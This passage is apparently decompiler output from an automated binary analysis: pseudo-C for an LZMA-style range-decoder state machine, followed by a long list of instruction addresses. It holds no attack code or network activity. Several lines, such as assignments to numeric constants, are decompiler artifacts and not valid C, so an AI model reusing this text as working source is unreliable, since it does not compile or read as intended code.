											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                        0x00000000
                        0x00407068
                        0x00407068
                        0x0040706c
                        0x00407095
                        0x0040709f
                        0x0040706e
                        0x00407077
                        0x00407084
                        0x00407087
                        0x004073cb
                        0x004073cb
                        0x004073ce
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x0040741a
                        0x00000000
                        0x00000000
                        0x0040741c
                        0x00407420
                        0x004075cf
                        0x004075e5
                        0x004075ed
                        0x004075f4
                        0x004075f6
                        0x004075fd
                        0x00407601
                        0x00407601
                        0x0040742c
                        0x00407433
                        0x0040743b
                        0x0040743e
                        0x00407441
                        0x00407441
                        0x00407447
                        0x00407447
                        0x00406be3
                        0x00406be3
                        0x00406be3
                        0x00406bec
                        0x00000000
                        0x00000000
                        0x00406bf2
                        0x00000000
                        0x00406bfd
                        0x00000000
                        0x00000000
                        0x00406c06
                        0x00406c09
                        0x00406c0c
                        0x00406c10
                        0x00000000
                        0x00000000
                        0x00406c16
                        0x00406c19
                        0x00406c1b
                        0x00406c1c
                        0x00406c1f
                        0x00406c21
                        0x00406c22
                        0x00406c24
                        0x00406c27
                        0x00406c2c
                        0x00406c31
                        0x00406c3a
                        0x00406c4d
                        0x00406c50
                        0x00406c5c
                        0x00406c84
                        0x00406c86
                        0x00406c94
                        0x00406c94
                        0x00406c98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406c88
                        0x00406c88
                        0x00406c8b
                        0x00406c8c
                        0x00406c8c
                        0x00000000
                        0x00406c88
                        0x00406c62
                        0x00406c67
                        0x00406c67
                        0x00406c70
                        0x00406c78
                        0x00406c7b
                        0x00000000
                        0x00406c81
                        0x00406c81
                        0x00000000
                        0x00406c81
                        0x00000000
                        0x00406c9e
                        0x00406c9e
                        0x00406ca2
                        0x0040754e
                        0x00000000
                        0x0040754e
                        0x00406cab
                        0x00406cbb
                        0x00406cbe
                        0x00406cc1
                        0x00406cc1
                        0x00406cc1
                        0x00406cc4
                        0x00406cc8
                        0x00000000
                        0x00000000
                        0x00406cca
                        0x00406cd0
                        0x00406cfa
                        0x00406d00
                        0x00406d07
                        0x00000000
                        0x00406d07
                        0x00406cd6
                        0x00406cd9
                        0x00406cde
                        0x00406cde
                        0x00406ce9
                        0x00406cf1
                        0x00406cf4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d39
                        0x00406d3f
                        0x00406d42
                        0x00406d4f
                        0x00406d57
                        0x004073cb
                        0x00000000
                        0x00000000
                        0x00406d0e
                        0x00406d0e
                        0x00406d12
                        0x0040755d
                        0x00000000
                        0x0040755d
                        0x00406d1e
                        0x00406d29
                        0x00406d29
                        0x00406d29
                        0x00406d2c
                        0x00406d2f
                        0x00406d32
                        0x00406d37
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004073ce
                        0x004073ce
                        0x004073d4
                        0x004073da
                        0x004073e0
                        0x004073fa
                        0x004073fd
                        0x00407403
                        0x0040740e
                        0x00407410
                        0x004073e2
                        0x004073e2
                        0x004073f1
                        0x004073f5
                        0x004073f5
                        0x0040741a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406d5f
                        0x00406d61
                        0x00406d64
                        0x00406dd5
                        0x00406dd8
                        0x00406ddb
                        0x00406de2
                        0x00406dec
                        0x004073cb
                        0x004073cb
                        0x00000000
                        0x004073cb
                        0x004073cb
                        0x00406d66
                        0x00406d6a
                        0x00406d6d
                        0x00406d6f
                        0x00406d72
                        0x00406d75
                        0x00406d77
                        0x00406d7a
                        0x00406d7c
                        0x00406d81
                        0x00406d84
                        0x00406d87
                        0x00406d8b
                        0x00406d92
                        0x00406d95
                        0x00406d9c
                        0x00406da0
                        0x00406da8
                        0x00406da8
                        0x00406da8
                        0x00406da2
                        0x00406da2
                        0x00406da2
                        0x00406d97
                        0x00406d97
                        0x00406d97
                        0x00406dac
                        0x00406daf
                        0x00406dcd
                        0x00406dcf
                        0x00000000
                        0x00406db1
                        0x00406db1
                        0x00406db4
                        0x00406db7
                        0x00406dba
                        0x00406dbc
                        0x00406dbc
                        0x00406dbc
                        0x00406dbf
                        0x00406dc2
